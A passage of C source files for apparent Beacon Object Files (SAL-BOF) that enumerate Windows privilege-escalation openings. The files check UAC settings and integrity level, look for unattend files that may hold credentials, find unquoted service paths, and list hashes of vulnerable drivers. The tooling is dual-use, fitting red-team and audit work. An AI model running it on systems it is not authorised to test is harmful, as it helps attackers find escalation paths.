    PTOKEN_PRIVILEGES tokenPrivileges = (PTOKEN_PRIVILEGES)KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, tokenInfoSize);
    if (!tokenPrivileges) {
        BeaconPrintf(CALLBACK_OUTPUT, "[PRIVILEGE] Memory allocation failed.\n");
        goto cleanup;
    }
    if (!ADVAPI32$GetTokenInformation(tokenHandle, TokenPrivileges, tokenPrivileges, tokenInfoSize, &tokenInfoSize)) {
        BeaconPrintf(CALLBACK_OUTPUT,"[PRIVILEGE] Failed to get token privileges. Error: %lu\n", KERNEL32$GetLastError());
        goto cleanup;
    }

    DisplayPrivileges(tokenPrivileges);

    cleanup:
        if (tokenPrivileges) {
            KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, tokenPrivileges);
        }
        if (tokenHandle) {
            KERNEL32$CloseHandle(tokenHandle);
        }
}

================================================
FILE: SAL-BOF/privcheck/uacstatus.c
================================================
#include <windows.h>
#include <stdio.h>
#include "beacon.h"
#include "bofdefs.h"

void go() {
    HKEY hKey = NULL;
    LONG lResult = 0;
    DWORD dwEnableLUA = 0;
    DWORD dwConsentPrompt = 0;
    DWORD dwSecureDesktop = 0;
    DWORD dwSize = sizeof(DWORD);
    DWORD dwType = 0;
    HANDLE hToken = NULL;
    DWORD dwIntegrityLevel = 0;
    PTOKEN_MANDATORY_LABEL pTIL = NULL;
    PTOKEN_GROUPS pTokenGroups = NULL;
    DWORD dwLengthNeeded = 0;
    HANDLE hHeap = NULL;
    BOOL bIsAdmin = FALSE;
    BOOL bIsElevated = FALSE;
    PSID pAdminSid = NULL;

    SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY;

    lResult = ADVAPI32$RegOpenKeyExA(HKEY_LOCAL_MACHINE,
        "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
        0, KEY_READ, &hKey);

    if (lResult != ERROR_SUCCESS) {
        BeaconPrintf(CALLBACK_OUTPUT, "[UACSTATUS] Failed to open registry key. Error: %ld\n", lResult);
        return;
    }

    dwSize = sizeof(DWORD);
    lResult = ADVAPI32$RegQueryValueExA(hKey, "EnableLUA", NULL, &dwType, (LPBYTE)&dwEnableLUA, &dwSize);
    if (lResult == ERROR_SUCCESS) {
        BeaconPrintf(CALLBACK_OUTPUT, "[UACSTATUS] UAC Enabled (EnableLUA): %s\n", dwEnableLUA ? "Yes" : "No");
    } else {
        BeaconPrintf(CALLBACK_OUTPUT, "[UACSTATUS] UAC Enabled (EnableLUA): Unknown (not found)\n");
    }

    dwSize = sizeof(DWORD);
    lResult = ADVAPI32$RegQueryValueExA(hKey, "ConsentPromptBehaviorAdmin", NULL, &dwType, (LPBYTE)&dwConsentPrompt, &dwSize);
    if (lResult == ERROR_SUCCESS) {
        const char* desc = "Unknown";
        switch (dwConsentPrompt) {
            case 0: desc = "Elevate without prompting"; break;
            case 1: desc = "Prompt for credentials on secure desktop"; break;
            case 2: desc = "Prompt for consent on secure desktop"; break;
            case 3: desc = "Prompt for credentials"; break;
            case 4: desc = "Prompt for consent"; break;
            case 5: desc = "Prompt for consent for non-Windows binaries"; break;
        }
        BeaconPrintf(CALLBACK_OUTPUT, "[UACSTATUS] ConsentPromptBehaviorAdmin: %lu (%s)\n", dwConsentPrompt, desc);
    }

    dwSize = sizeof(DWORD);
    lResult = ADVAPI32$RegQueryValueExA(hKey, "PromptOnSecureDesktop", NULL, &dwType, (LPBYTE)&dwSecureDesktop, &dwSize);
    if (lResult == ERROR_SUCCESS) {
        BeaconPrintf(CALLBACK_OUTPUT, "[UACSTATUS] PromptOnSecureDesktop: %s\n", dwSecureDesktop ? "Yes" : "No");
    }

    ADVAPI32$RegCloseKey(hKey);
    hKey = NULL;

    if (!ADVAPI32$OpenProcessToken(KERNEL32$GetCurrentProcess(), TOKEN_QUERY, &hToken)) {
        BeaconPrintf(CALLBACK_OUTPUT, "[UACSTATUS] Failed to open process token. Error: %lu\n", KERNEL32$GetLastError());
        return;
    }

    hHeap = KERNEL32$GetProcessHeap();

    dwLengthNeeded = 0;
    ADVAPI32$GetTokenInformation(hToken, TokenIntegrityLevel, NULL, 0, &dwLengthNeeded);
    if (dwLengthNeeded > 0) {
        pTIL = (PTOKEN_MANDATORY_LABEL)KERNEL32$HeapAlloc(hHeap, HEAP_ZERO_MEMORY, dwLengthNeeded);
        if (pTIL) {
            if (ADVAPI32$GetTokenInformation(hToken, TokenIntegrityLevel, pTIL, dwLengthNeeded, &dwLengthNeeded)) {
                PUCHAR pCount = ADVAPI32$GetSidSubAuthorityCount(pTIL->Label.Sid);
                if (pCount && *pCount > 0) {
                    PDWORD pLevel = ADVAPI32$GetSidSubAuthority(pTIL->Label.Sid, (DWORD)(*pCount - 1));
                    if (pLevel) {
                        dwIntegrityLevel = *pLevel;
                    }
                }
            }
        }
    }

    if (dwIntegrityLevel < SECURITY_MANDATORY_LOW_RID) {
        BeaconPrintf(CALLBACK_OUTPUT, "[UACSTATUS] Integrity Level: Untrusted\n");
    } else if (dwIntegrityLevel < SECURITY_MANDATORY_MEDIUM_RID) {
        BeaconPrintf(CALLBACK_OUTPUT, "[UACSTATUS] Integrity Level: Low\n");
    } else if (dwIntegrityLevel >= SECURITY_MANDATORY_MEDIUM_RID && dwIntegrityLevel < SECURITY_MANDATORY_HIGH_RID) {
        BeaconPrintf(CALLBACK_OUTPUT, "[UACSTATUS] Integrity Level: Medium\n");
    } else if (dwIntegrityLevel >= SECURITY_MANDATORY_HIGH_RID && dwIntegrityLevel < SECURITY_MANDATORY_SYSTEM_RID) {
        BeaconPrintf(CALLBACK_OUTPUT, "[UACSTATUS] Integrity Level: High (Elevated)\n");
        bIsElevated = TRUE;
    } else if (dwIntegrityLevel >= SECURITY_MANDATORY_SYSTEM_RID) {
        BeaconPrintf(CALLBACK_OUTPUT, "[UACSTATUS] Integrity Level: System\n");
        bIsElevated = TRUE;
    }

    if (!ADVAPI32$AllocateAndInitializeSid(&NtAuthority, 2,
            SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS,
            0, 0, 0, 0, 0, 0, &pAdminSid)) {
        BeaconPrintf(CALLBACK_OUTPUT, "[UACSTATUS] Failed to create Admin SID. Error: %lu\n", KERNEL32$GetLastError());
        goto cleanup;
    }

    dwLengthNeeded = 0;
    ADVAPI32$GetTokenInformation(hToken, TokenGroups, NULL, 0, &dwLengthNeeded);
    if (dwLengthNeeded > 0) {
        pTokenGroups = (PTOKEN_GROUPS)KERNEL32$HeapAlloc(hHeap, HEAP_ZERO_MEMORY, dwLengthNeeded);
        if (pTokenGroups) {
            if (ADVAPI32$GetTokenInformation(hToken, TokenGroups, pTokenGroups, dwLengthNeeded, &dwLengthNeeded)) {
                for (DWORD i = 0; i < pTokenGroups->GroupCount; i++) {
                    if (ADVAPI32$EqualSid(pAdminSid, pTokenGroups->Groups[i].Sid)) {
                        bIsAdmin = TRUE;
                        break;
                    }
                }
            }
        }
    }

    BeaconPrintf(CALLBACK_OUTPUT, "[UACSTATUS] Local Admin Group Member: %s\n", bIsAdmin ? "Yes" : "No");

    if (bIsElevated) {
        BeaconPrintf(CALLBACK_OUTPUT, "[UACSTATUS] Process is running with elevated privileges\n");
    } else if (bIsAdmin && dwEnableLUA) {
        BeaconPrintf(CALLBACK_OUTPUT, "[UACSTATUS] User is local admin but NOT elevated (UAC filtered token)\n");
        BeaconPrintf(CALLBACK_OUTPUT, "[UACSTATUS] UAC bypass may be possible\n");
    } else if (bIsAdmin && !dwEnableLUA) {
        BeaconPrintf(CALLBACK_OUTPUT, "[UACSTATUS] User is local admin and UAC is disabled\n");
    } else {
        BeaconPrintf(CALLBACK_OUTPUT, "[UACSTATUS] User is NOT a local admin\n");
    }

cleanup:
    if (pAdminSid) ADVAPI32$FreeSid(pAdminSid);
    if (pTokenGroups) KERNEL32$HeapFree(hHeap, 0, pTokenGroups);
    if (pTIL) KERNEL32$HeapFree(hHeap, 0, pTIL);
    if (hToken) KERNEL32$CloseHandle(hToken);
    if (hKey) ADVAPI32$RegCloseKey(hKey);
}


================================================
FILE: SAL-BOF/privcheck/unattendfiles.c
================================================
#include <stdio.h>
#include <windows.h>
#include "beacon.h"
#include "bofdefs.h"

void go() {
    char szWinDir[MAX_PATH * 2];
    int NumOfFoundFiles = 0;
    HANDLE hFile;

    // Resolve Windows Directory path
    if (KERNEL32$GetWindowsDirectoryA(szWinDir, sizeof(szWinDir)) == 0) {
        BeaconPrintf(CALLBACK_OUTPUT, "[UNATTEND_FILES] Failed to resolve Windows directory\n");
        return;
    }

    // List of common Unattend Setup Files
    static const char * UnattendFiles[] = {
            "\\sysprep\\sysprep.xml",
            "\\sysprep\\sysprep.inf",
            "\\sysprep.inf",
            "\\Panther\\Unattended.xml",
            "\\Panther\\Unattend.xml",
            "\\Panther\\Unattend\\Unattend.xml",
            "\\Panther\\Unattend\\Unattended.xml",
            "\\System32\\Sysprep\\unattend.xml",
            "\\System32\\Sysprep\\Panther\\unattend.xml",
            NULL
    };

    // Iterate over each potential file
    for (int i = 0; UnattendFiles[i] != NULL; i++) {
        char FullPath[MAX_PATH * 2];

        // Prepend the Windows directory to the path
        USER32$wsprintfA(FullPath, "%s%s", szWinDir, UnattendFiles[i]);

        // Check if file exists
        hFile = KERNEL32$CreateFileA(FullPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
        if (hFile != INVALID_HANDLE_VALUE) {
            BeaconPrintf(CALLBACK_OUTPUT, "[UNATTEND_FILES] Unattend file found: %s\n", FullPath);
            NumOfFoundFiles++;
            KERNEL32$CloseHandle(hFile);
        }

    }
    BeaconPrintf(CALLBACK_OUTPUT, "[UNATTEND_FILES] Found a total of %d unattend files\n", NumOfFoundFiles);
}


================================================
FILE: SAL-BOF/privcheck/unquotedsvcpath.c
================================================
#include <windows.h>
#include <string.h>
#include <shlwapi.h>
#include "bofdefs.h"
#include "beacon.h"


void go() {
    HKEY servicesKey;
    BOOL foundVulnerablePath = FALSE;
    if (ADVAPI32$RegOpenKeyExA(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services\\", 0, KEY_READ, &servicesKey) == ERROR_SUCCESS) {
        char serviceSubkeyName[256];
        DWORD subkeyIndex = 0;
        DWORD subkeyNameSize = sizeof(serviceSubkeyName);
        while (TRUE) {
            subkeyNameSize = sizeof(serviceSubkeyName);
            if (ADVAPI32$RegEnumKeyExA(servicesKey, subkeyIndex++, serviceSubkeyName, &subkeyNameSize, NULL, NULL, NULL, NULL) != ERROR_SUCCESS) {
                break;
            }
                HKEY imagePathKey;
                if (ADVAPI32$RegOpenKeyExA(servicesKey, serviceSubkeyName, 0, KEY_READ, &imagePathKey) == ERROR_SUCCESS) {
                    char imagePathValue[1024] = { 0 };
                    DWORD valueSize = sizeof(imagePathValue);
                    if (ADVAPI32$RegGetValueA(imagePathKey, NULL, "ImagePath", RRF_RT_REG_SZ, NULL, &imagePathValue, &valueSize) != ERROR_SUCCESS) {
                        ADVAPI32$RegCloseKey(imagePathKey);
                        continue;
                    }

                    if (SHLWAPI$StrStrIA(imagePathValue, " ") == NULL || SHLWAPI$StrStrIA(imagePathValue, "\"") != NULL) {
                        ADVAPI32$RegCloseKey(imagePathKey);
                        continue;
                    }

                    if (SHLWAPI$StrStrIA(imagePathValue, "System32") != NULL ||
                        SHLWAPI$StrStrIA(imagePathValue, "SysWow64") != NULL ||
                        SHLWAPI$StrStrIA(imagePathValue, ".sys") != NULL)
                    {
                        ADVAPI32$RegCloseKey(imagePathKey);
                        continue;
                    }

                    BeaconPrintf(CALLBACK_OUTPUT, "[SERVICE_PATH] Service '%s' has an unquoted executable path: %s\n", serviceSubkeyName, imagePathValue);
                    foundVulnerablePath = TRUE;

                    ADVAPI32$RegCloseKey(imagePathKey);
                }
        }
        ADVAPI32$RegCloseKey(servicesKey);
    }

    if (!foundVulnerablePath) {
        BeaconPrintf(CALLBACK_OUTPUT, "[SERVICE_PATH] No unquoted service paths found");
    }
}

================================================
FILE: SAL-BOF/privcheck/vulndrivers.h
================================================
#include <windows.h>
#ifndef VULNDRIVERS_H
#define VULNDRIVERS_H

const char* VulnerableHashes[] = {
    "00143C457C8885FD935FC5D5A6BA07A4",
    "002A58B90A589913A07012253662C98C",
    "003E61358878C7E49E18420EE0B4A37B51880BE40929A76E529C7B3FB18E81B4",
    "005AC9213A8A4A6C421787A7B25C0BC7B9F3B309",
    "00685003005B0B437AF929F0499545E4",
    "006D9D615CDCC105F642AB599B66F94E",
    "007B2C7D72A5A89B424095DBB7F67FF2AEDDB277",
    "008A292F71F49BE1FB538F876DE6556CE7B5603A",
    "009876AB9CF3A3D4E3FC3AFE13AE839E",
    "00B3FF11585C2527B9E1C140FD57CB70B18FD0B775EC87E9646603056622A1FD",
    "00F887E74FAAD40E6E97D9D0E9C71370",
    "010C0E5AC584E3AB97A2DAF84CF436F5",
    "0123C7F12DD7530D55AEE49949FF1FEE911C9689BD04591684AA641882589785",
    "012DB3A80FAF1F7F727B538CBE5D94064E7159DE",
    "013719E840E955C2E4CD9D18C94A2625",
    "016AA643FBD8E10484741436BCACC0D9EEE483C8",
    "0199A59AF05D9986842ECBDEE3884F0C",
    "019C2955E380DD5867C4B82361A8D8DE62346EF91140C95CB311B84448C0FA4F",
    "01A578A3A39697C4DE8E3DAB04DBA55A4C35163E",
    "01B95AE502AA09AABC69A0482FCC8198F7765950",
    "01F092BE2A36A5574005E25368426AD2",
    "0209934453E9CE60B1A5E4B85412E6FAF29127987505BFB1185FC9296C578B09",
    "0215D0681979987FE908FB19DAB83399",
    "022F7AA4D0F04D594588AE9FA65C90BCC4BDA833",
    "02316DECF9E5165B431C599643F6856E86B95E7C",
    "027E10A5048B135862D638B9085D1402",
    "0283B43C6BC965175A1C92B255D39556",
    "0291CED808EAFE406D3D9B56D2FC0C26",
    "0296E2CE999E67C76352613A718E11516FE1B0EFC3FFDB8918FC999DD76A73A5",
    "029C678674F482ABABE8BBFDB93152392457109D",
    "02A1D77EF13BD41CAD04ABCCE896D0B9",
    "02A8B74899591DA7B7F49C0450328D39B939D7E4",
    "02FC655279B8EA3EF37237C488B675CC",
    "0307D76750DD98D707C699AEE3B626643AFB6936",
    "030C8432981E4D41B191624B3E07AFE2",
    "03257294EE74F69881002C4BF764B9CB83B759D6",
    "033C4634AB1A43BC3247384864F3380401D3B4006A383312193799DDED0DE4C7",
    "03680068EC41BBE725E1ED2042B63B82391F792E8E21E45DC114618641611D5D",
    "0395B4E0EB21693590AD1CFDF7044B8B",
    "03A56369B8B143049A6EC9F6CC4EF91AC2775863",
    "03C9D5F24FD65AD57DE2D8A2C7960A70",
    "03CA3B1CFF154AB8855043ABADD07956",
    "0420FA6704FD0590C5CE7176FDADA650",
    "043D5A1FC66662A3F91B8A9C027F9BE9",
    "0452A6E8F00BAE0B79335C1799A26B2B77D603451F2E6CC3B137AD91996D4DEC",
    "045EF7A39288BA1F4B8D6ECA43DEF44F",
    "0466DAC557EE161503F5DFBD3549F81EC760C3D6C7C4363A21A03E7A3F66ACA8",
    "0466E90BF0E83B776CA8716E01D35A8A2E5F96D3",
    "047C06D4D38EA443C9AF23A501C4480D",
    "0484DEFCF1B5AFBE573472753DC2395E528608B688E5C7D1D178164E48E7BED7",
    "0490F5961E0980792F5CB5AEDF081DD7",
    "04A269DD0A03E32E5B2A1C8AB0768791962E040D080D44DC44DAB01DD7954F2B",
    "04FD5EB356F63E2AFC218A32AA7C27C9E9A5C42A",
    "0507D893E3FD2917C81C1DC13CCB22AE5402AB6CA9FB8D89485010838050D08D",
    "05369FA594A033E48B7921018B3263FB",
    "0536C9F15094CA8DDEEF6DEC75D93DC35366D8A9",
    "054299E09CEA38DF2B84E6B29348B418",
    "054A50293C7B4EEA064C91EF59CF120D8100F237",
    "05A6F843C43D75FBCE8E885BB8656AA4",
    "05AC1C64CA16AB0517FE85D4499D08199E63DF26",
    "05B4463677E2566414AD53434AD9E7E5",
    "05BF59560656C8A9A3191812B0E1235B",
    "05E3E9B89EBDCCBE18343652929896813A988D59",
    "05EFF2001F595F9E2894C6B5EEE756AE72379A6D",
    "062CEC364B033D343C46EE64282B632687229790",
    "0634299FC837B47B531E4762D946B2AE",
    "0634878C3F6048A38EC82869D7C6DF2F69F3E210",
    "064847AF77AFCA8A879A9BF34CB87B64B5E69165",
    "06897B431C07886454E0681723DD53E6",
    "06B52BA103412F4AB49FAC7129129C10570FD6FD",
    "06ECF73790F0277B8E27C8138E2C9AD0FC876438",
    "06FFBB2CBF5AC9EF95773B4F5C4C896A",
    "0703C1E07186CB98837A2AE76F50D42E",
    "07493C774AA406478005E8FE52C788B2",
    "0752F113D983030939B4AB98B0812CF0",
    "0761C357AED5F591142EDAEFDF0C89C8",
    "077AA8FF5E01747723B6D24CC8AF460A7A00F30CD3BC80E41CC245CEB8305356",
    "078AE07DEC258DB4376D5A2A05B9B508D68C0123",
    "079627E0F5B1AD1FB3FE64038A09BC6E8B8D289D",
    "0797BB21D7A0210FEDF4F3533EE82494",
    "07AF8C5659AD293214364789DF270C0E6D03D90F4F4495DA76ABC2D534C64D88",
    "07C244739803F60A75D60347C17EDC02D5D10B5D",
    "07D0090C76155318E78A676E2F8AF1500C20AAA1E84F047C674D5F990F5A09C8",
    "07EFB8259B42975D502A058DB8A3FD21",
    "07F60B2B0E56CB15AAD3CA8A96D9FE3A91491329",
    "07F62D9B6321BED0008E106E9CE4240CB3F76DA2",
    "07F83829E7429E60298440CD1E601A6A",
    "07FB2BB6C852F6A6FE982B2232F047E167BE39738BAC26806FFE0927BA873756",
    "07FC1E043654FDDE56DA98D93523635C",
    "0809F48FD30845D983D569B847FA83CF",
    "082C39FE2E3217004206535E271EBD45C11EB072EFDE4CC9885B25BA5C39F91D",
    "082D4D4D4BA1BDA5E1599BD24E930AE9F000E7D12B00F7021CCA90A4600EA470",
    "084A13F18856D610D44D3109A9D2ACDE",
    "084BD27E151FEF55B5D80025C3114D35",
    "085C0EA6980CB93A3AFA076764B7866467AC987C",
    "085D3423F3C12A17119920F1A293AB4D",
    "08828990218EBB4415C1BB33FA2B0A009EFD0784B18B3F7ECD3BC078343F7208",
    "089411E052EA17D66033155F77AE683C50147018",
    "08BAC71557DF8A9B1381C8C165F64520",
    "08C1BCE6627764C9F8C79439555C5636",
    "08E06B839499CB4B752347399DB41B57",
    "08EFD5E24B5EBFEF63B5E488144DC9FB6524EAF1",
    "0904B8FA4654197EEFD6380C81BBB2149FFE0634",
    "091A039F5F2AE1BB0FA0F83660F4C178FD3A5A10",
    "091DF975FA983E4AD44435CA092DBF84911F28A5",
    "09672532194B4BFF5E0F7A7D782C7BF2",
    "09927915ABA84C8ACD91EFDAAC674B86",
    "09B3D078FFA3B4ED0AD2E477A2EE341F",
    "09E77D71D626574E6142894CACA6E6DD",
    "09F117D83F2F206EE37F1EB19EEA576A0AC9BDCC",
    "0A02625927613C9A492A9EAC3EA943DDF6F64028",
    "0A19A9C4C9185B80188DA529EC9C9F45CBE73186",
    "0A2EC9E3E236698185978A5FC76E74E6",
    "0A4E6BD5CC2E9172E461408BE47C3149",
    "0A5EF5B72E621A639860C03F1CAC499567082F39",
    "0A653D9D0594B152CA835D0B2593269F",
    "0A6E0F9F3D7179A99345D40E409895C12919195B",
    "0A89A6AB2FCA486480B6E3DACF392D6CE0C59A5BDB4BCD18D672FEB4EBB0543C",
    "0A89A6F6F40213356487BFCFB0B129E4F6375180",
    "0A9B608461D55815E99700607A52FBDB7D598F968126D38E10CC4293AC4B1AD8",
    "0AC0C21CA05161EAA6A042F347391A2A2FC78C96",
    "0AC31915EC9A6B7D4D4BBA8FE6D60FF7",
    "0ACA4447EE54D635F76B941F6100B829DC8B2E0DF27BDF584ACB90F15F12FBDA",
    "0AD87BBA19F0B71CCB2D32239ABD49EC",
    "0ADC1320421F02F2324E764AA344018758514436",
    "0AECDC0B8208B81B0C37EEF3B0EAEA8D8EBEF42E",
    "0AFF83F28D70F425539FEE3D6A780210D0406264F8A4EB124E32B074E8FFD556",
    "0B01C4C1F18D72EB622BE2553114F32EDFE7B7AA",
    "0B0447072ADA1636A14087574A512C82",
    "0B3836D5D98BC8862A380AAE19CAA3E77A2D93EF",
    "0B542E47248611A1895018EC4F4033EA53464F259C74EB014D018B19AD818917",
    "0B547368C03E0A584AE3C5E62AF3728426C68B316A15F3290316844D193AD182",
    "0B63E76FAD88AC48DBFC7CF227890332FCD994A5",
    "0B77242D4E920F2FCB2B506502CFE3985381DEFC",
    "0B8887921E4A22E24FD058BA5AC40061B4BB569AC7207B9548168AF9D6995E7C",
    "0B8B83F245D94107CB802A285E6529161D9A834D",
    "0BA6AFE0EA182236F98365BD977ADFDF",
    "0BC3685B0B8ADC97931B5D31348DA235CD7581A67EDF6D79913E6A5709866135",
    "0BD1523A68900B80ED1BCCB967643525CCA55D4FF4622D0128913690E6BB619E",
    "0BD164DA36BD637BB76CA66602D732AF912BD9299CB3D520D26DB528CB54826D",
    "0BD3B9F55A2D3A13F506D9D8B970E0DE",
    "0BE4A11BC261F3CD8B4DBFEBEE88C209",
    "0BE5C6476DD58072C93AF4FCA62EE4B3",
    "0BE77BB3720283C9A970A97DAB25D2A312E86110",
    "0BE80DB5D9368FDB29FE9D9BFDD02E7C",
    "0C018EAA293C03FEBE2AEF1E868FCA782A06B49D7D2F9F388AE5FB57604C5250",
    "0C0195C48B6B8582FA6F6373032118DA",
    "0C10FF27F2AB76BBE6DDECE8C1B2CFF05E5483CC",
    "0C42FE45FFA9A9C36C87A7F01510A077DA6340FFD86BF8509F02C6939DA133C5",
    "0C55128C301921CE71991A6D546756AD",
    "0C7F66CD219817EAAB41F36D4BC0D4CD",
    "0C925468C3376458D0E1EC65E097BD1A81A03901035C0195E8F6EF904EF3F901",
    "0CAC0DBAA7ADB7BBA6E92C7CD2D514BE7E86A914",
    "0CAF4E86B14AAAB7E10815389FCD635988BC6637",
    "0CB14C1049C0E81C8655AB7EE7D698C11758EA06",
    "0CC60A56E245E70F664906B7B67DFE1B4A08A5B7",
    "0CCA79962D9AF574169F5DEC12B1F4CA8E5E1868",
    "0CCC4E9396E0BE9C4639FAEC53715831",
    "0CD0FE9D16B62415B116686A2F414F8C",
    "0CD2504A2E0A8AD81D9A3A6A1FAD7306",
    "0CD4CA335155062182608CAD9EF5C8351A715BCE92049719DD09C76422CD7B0C",
    "0CE40A2CDD3F45C7632B858E8089DDFDD12D9ACB286F2015A4B1B0C0346A572C",
    "0CF6C6C2D231EAF67DFC87561CC9A56ECEF89AB50BAAFEE5A67962748D51FAF3",
    "0CF91E8F64A7C98DBEAB21597BD76723AEE892ED8FA4EE44B09F9E75089308E2",
    "0CFB7EA2CC515A7FE913AB3619CBFCF1CA96D8CF72DC350905634A5782907A49",
    "0D123BE07E2DFD2B2ADE49AD2A905A5B",
    "0D27A3166575EC5983EC58DE2591552CFA90EF92",
    "0D3790AF5F8E5C945410929E31D06144A471AC82F828AFE89A4758A5BBEB7F9F",
    "0D4306983E694C1F34920BAE12D887E6",
    "0D5774527AF6E30905317839686B449D",
    "0D6FB0CB9566B4E4CA4586F26FE0631FFA847F2C",
    "0D8A832B9383FCDC23E83487B188DDD30963CA82",
    "0D8DAF471D871DEB90225D2953C0EB95",
    "0D992B69029D1F23A872FF5A3352FB5B",
    "0D9C77ACA860A43CCA87A0C00F69E2AB07AB0B67",
    "0DC4FF96D7E7DB696E0391C5A1DDA92A0B0AEDBF1B0535BF5D62EBEEC5B2311C",
    "0DF5E8599B332A7927BD0A9D87AD9D6B5AD332FE",
    "0E030CF5E5996F0778452567E144F75936DC278F",
    "0E10D3C73596E359462DC6BFCB886768486FF59E158F0F872D23C5E9A2F7C168",
    "0E14B69DCF67C20343F85F9FDB5B9300",
    "0E207EF80361B3D047A2358D0E2206B4",
    "0E2D4679F68796E9DD0D663137CB9E12",
    "0E2FC7E7F85C980EB698B9E468C20366",
    "0E47BD9B67500A67CE18C24328D6D0DB8AE2C493",
    "0E51D96A3B878B396708535F49A6D7CB",
    "0E60414750C48676D7AA9C9EC81C0A3B3A4D53D0",
    "0E625B7A7C3F75524E307B160F8DB337",
    "0E8595217F4457757BED0E3CDEA25EA70429732B173BBA999F02DC85C7E06D02",
    "0E9072759433ABF3304667B332354E0C635964FF930DE034294BF13D40DA2A6F",
    "0EAB16C7F54B61620277977F8C332737081A46BC6BBDE50742B6904BDD54F502",
    "0EACE788E09C8D3F793A1FAD94D35BCFD233F0777873412CD0C8172865562EEC",
    "0EB3DFEFFB49D32310D96F3AA3E8CA61",
    "0EC31F45E2E698A83131B4443F9A6DD7",
    "0EC361F2FBA49C73260AF351C39FF9CB",
    "0EDF51A0FAC3B90F6961C2B20BBAEB4CCFC1EA84",
    "0EF05030ABD55BA6B02FAA2C0970F67F",
    "0F016C80C4938FBCD47A47409969B3925F54292EBA2CE01A8E45222CE8615EB8",
    "0F17E5CFC5BDD74AFF91BFB1A836071345BA2B5D1B47B0D5BF8E7E0D4D5E2DBF",
    "0F2FDFB249C260C892334E62AB77AC88FCB8B5E4",
    "0F30ECD4FAEC147A2335A4FC031C8A1AC9310C35339EBEB651EB1429421951A0",
    "0F3E7BF7B103613844A38AFB574817DDAECD00E4D206D891660DBB0E5DFEE04E",
    "0F45C274B86BDCFFBA8D09A3CDFCE974B10E3BFE",
    "0F78974194B604122B1CD4E82768155F946F6D24",
    "0FBF893691A376B168D8CDF427B89945",
    "0FC0644085F956706EA892563309BA72F0986B7A3D4AA9AE81C1FA1C35E3E2D3",
    "0FC2653B1C45F08CA0ABD1EB7772E3C0",
    "0FC3BC6E81B04DCAA349F59F04D6C85C55A2FEA5DB8FA0BA53D3096A040CE5A7",
    "0FD700FEE341148661616ECD8AF8ECA5E9FA60E3",
    "0FF2AD8941FBB80CBCCB6DB7DB1990C01C2869B1",
    "0FFE35F0B0CD5A324BBE22F02569AE3B",
    "100FE0BC0C183D16E1F08D1A2AD624A8",
    "1013D5A0FD6074A8C40DBF3A88E3E06FBF3BCF41",
    "101402D4F5D1AE413DED499C78A5FCBBC7E3BAE9B000D64C1DD64E3C48C37558",
    "1023DCD4C80DB19E9F82F95B1C5E1DDB60DB7AC034848DD5CC1C78104A6350F4",
    "1033F0849180AAC4B101A914BC8C53B4",
    "1078AF0C70E03AC17C7B8AA5EE03593F5DECFEF2F536716646A4DED1E98C153C",
    "108439A4C4508E8DCA659905128A4633D8851FD9",
    "108575D8F0B98FED29514A54052F7BF5A8CB3FF0",
    "10B30BDEE43B3A2EC4AA63375577ADE650269D25",
    "10B9AE9286837B3BF6A00771C7E81ADBDEA3CBFE",
    "10E681CE84AFDD642E59DDFDB28284E9",
    "10FC6933DEB7DE9813E07D864CE03334A4F489D9",
    "11208BBBA148736309A8D2A4AB9AB6B8F22F2297547B100D8BDFD7D413FE98B2",
    "112B4A6D8C205C1287C66AD0009C3226",
    "113056EC5C679B6F74C9556339EBF962",
    "115034373FC0EC8F75FB075B7A7011B603259ECC0ACA271445E559B5404A1406",
    "11832C345E9898C4F74D3BF8F126CF84B4B1A66AD36135E15D103DBF2AC17359",
    "118F3FDBA730094D17AA1B259586AEF6",
    "118F688C30A2F6C2D1FEB955F53CE4ACF3086B3B",
    "119C48B79735FDA0ECD973D77D9BDC6B329960CAED09B38AB454236CA039D280",
    "119F0656AB4BB872F79EE5D421E2B9F9",
    "11A4B08E70EBC25A1D4C35ED0F8EF576C1424C52B580115B26149BD224FFC768",
    "11A9787831AC4F0657AEB5E7019C23ACC39D8833FAF28F85BD10D7590EA4CC5F",
    "11BC55C0771D692279298211C1D434C04168E7C7F7C4328BFD600215B88C819B",
    "11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5",
    "11D258E05B850DCC9ECFACCCC9486E54BD928AAA3D5E9942696C323FDBD3481B",
    "11DC5523BB559F8D2CE637F6A2B70DEA",
    "11FB599312CB1CF43CA5E879ED6FB71E",
    "11FCAEDA49848474CEE9989A00D8F29CB727ACB7",
    "120B5BBB9D2EB35FF4F62D79507EA63A",
    "12154F58B68902A40A7165035D37974128DEB902",
    "1228D0B6B4F907384346F64E918CC28021FE1CD7D4E39687BCA34A708998261A",
    "12419F5499213E2341B71E9123B7E965863964B7",
    "125E4475A5437634CAB529DA9EA2EF0F4F65F89FB25A06349D731F283C27D9FE",
    "12656FC113B178FA3E6BFFFC6473897766C44120082483EB8059EBFF29B5D2DF",
    "1273B74C3C1553EAA92E844FBD51F716356CC19CF77C2C780D4899EC7738FBD1",
    "1276F735D22CF04676A719EDC6B0DF18",
    "1284A1462A5270833EC7719F768CDB381E7D0A9C475041F9F3C74FA8EEA83590",
    "1292C7DD60214D96A71E7705E519006B9DE7968F",
    "12CECC3C14160F32B21279C1A36B8338",
    "12EDA8B65ED8C1D80464A0C535EA099DFFDB4981C134294CB0FA424EFC85EE56",
    "130C5AEC46BDEC8D534DF7222D160FDB",
    "131D5490CEB9A5B2324D8E927FEA5BECFC633015661DE2F4C2F2375A3A3B64C6",
    "1336469EC0711736E742B730D356AF23F8139DA6038979CFE4DE282DE1365D3B",
    "133E542842656197C5D22429BD56D57AA33C9522897FDF29853A6D321033C743",
    "13572D36428EF32CFED3AF7A8BB011EE756302B0",
    "135B261EB03E830C57B1729E3A4653F9C27C7522",
    "1392B92179B07B672720763D9B1028A5",
    "13A0D3F9D5F39ADACA0A8D3BB327EB31",
    "13A2B915F6D93E52505656773D53096F",
    "13AE3081393F8100CC491EBB88BA58F0491B3550787CF3FD25A73AA7CA0290D9",
    "13AE4D9DCACBA8133D8189E59D9352272E15629E6BCA580C32AFF9810BD96E44",
